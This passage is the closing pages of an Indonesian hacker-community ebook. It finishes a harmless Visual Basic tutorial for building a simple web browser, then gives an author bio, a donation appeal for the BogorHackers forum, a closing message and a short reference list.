Lalu gunakan tools Web Browser yang bergambar icon bumi di sebelah kiri

Sekarang kita tambahkan perintah pada setiap command button yang telah dibuat tadi, dengan meng-klik
dua kali pada form.
 Pada Back tuliskan WebBrowser1.GoBack
 Pada Forward tuliskan WebBrowser1.GoForward
 Pada Go tuliskan WebBrowser1.Navigate (address.text) jika nama textbox diganti menjadi address
 Pada Refresh tuliskan WebBrowser1.Refresh

Sekarang kita lihat hasilnya, semoga tidak ada code yang error  , klik Run , Start. Jika sudah kita save
dengan cara File , Make Project1.exe .

Sekian artikel yang saya buat kali ini semoga bermanfaat bagi kawan-kawan semua 
31

BIOGRAFI PENULIS :
Naufal a.k.a CyberKaze, merupakan siswa SMAN 10 Bogor angkatan 2012/2013. Penulis masih banyak
belajar tentang dunia IT, dari programming hingga desain grafis. Penulis juga member aktif di
BogorHackers Community dan salah satu Administrator di BogorHackers Community.
There is No Perfect Security in Virtual World

Facebook : https://www.facebook.com/nnamikazen
Twitter : https://twitter.com/naufalnkz
Blog : http://cyberkaze.co.cc/
E-Mail : cyberkaze@gmail.com
 BHC Donation

32 Selayaknya sebuah forum pasti membutuhkan sebuah domain, hosting, dan keperluan lainnya.
Maka dari itu BogorHackers Community membuka donasi bagi teman-teman yang berminat dengan secara
sukarela untuk kemajuan forum BogorHackers Community.
Untuk saat ini ada dua metode untuk donasi, yaitu dengan mengirim donasi melalui rekening bank
dan berpartisipasi dalam memasang iklan bagi teman-teman yang mempunyai blog atau website untuk
BHC.
1. Donasi Melalui Rekening
Cara donasi disini cukup mudah hanya dengan mentransfer sejumlah saldo ke rekening yang
digunakan, disini jumlah saldo tidak ditetapkan terserah kepada teman-teman, karena ini bersifat sukarela
dan tidak ada unsurpemaksaaan. Jika ada yang berminat untuk donasi melalui rekening bisa PM Tomi di
YM tomi.riddles, atau di Facebook tomi.riddle https://www.facebook.com/tomi.riddle

2. Donasi Melalui Iklan BHC

Cara yang satu ini mungkin lebih mudah dan tidak menggunakan materi, karena metode ini cukup
dengan memasang iklan BHC di website atau blog kesayangan teman-teman. Untuk yang mau
berpartisipasi dan memasang iklan di website atau blognya, silahkan PM Tomi di YM tomi.riddles, atau di
Facebook tomi.riddle https://www.facebook.com/tomi.riddle . kami hanya merekomendasikan 1 iklan saja
yang untuk dipasang, sisanya terserah pada teman-teman.
Silahkan PM denan format :
 Nama blog :
 Jenis Blog :
 Jumlah Iklan :
 Posisi Iklan : vertical / horizontal / horizontal sidebar (untuk ukuran dapat disesuaikan)
 Jenis Iklan : text / mini banner
Disini kami menggunakan iklan dari Google Adsense, karena kami melihat kemudahan dalam melakukan
transaksi. Dengan satu kali cash out dalam sebulan, mungkin itu cukup untuk membayar hosting, dan
selebihnya akan dimasukkan kedalam kas dan dapat dilihat di http://bogorhacker.net/bhc-dashboard/508-
update-laporan-keuangan-bhc.html#post1076 . Dengan melakukan donasi, anda mendapatkan 100 point
reputation dan title BHC Donatur[$], dan bagi yang melakukan dua metode mendapat permission custom
title. Terimakasih untuk semua teman-teman atas partisipasinya.
 Penutup
Demikian yang dapat kami Sampaikan pada Ebook ini, tentu manusia penuh dengan
banyak kekurangan dan kelemahan, karena keterbatasan kemampuan, oleh karena itu Kami
berharap para Pembaca Ebook dan teman-teman BogorHackers Community dapat memberi
kritik dan saran yang membangun kepada kami untuk memperbaiki di masa yang akan
datang.
33 Semoga Ebook ini dapat berguna bagi para pembaca dan teman-teman yang ingin
belajar tentang hacker dan lain-lain yang berkaitan dengan dunia underground, dan untuk
membangkitkan semangat juang belajar dan pratik ( learning by doing).
Kita semua pasti bisa jika bersungguh-sungguh dalam suatu ilmu pengetahuan dan
perkerjaan, dan mengembangkat potensi dan bakat yang ada dalam diri kita dengan itu kita
bebas berkarya dan mencurahkan segala ilmu pengetahuan dengan gratis.
Maju terus hacker Indonesia, semoga kita bisa menguasai dunia, semoga kita
mengalahkan teknologi yang lebih maju seperti Amerika Serikat. Semoga BogorHackers
Community terus bertambah anggota dan member yang aktif!!

Kami menerima kritik dan saran melalu email, facebook dan forum. Supaya kita
berharap kedepannya lebih baik

Email : ebook@bogorhacker.net
Forum : http://www.bogorhacker.net
Facebook : https://www.facebook.com/groups/bhcrew/
 DAFTAR PUSTAKA

34 http://www.google.co.id
http://www.google.co.uk

http://www.google.co.il

http://www.bogorhacker.net

dan masih banyak lagi maaf tidak di sebutkan satu per satu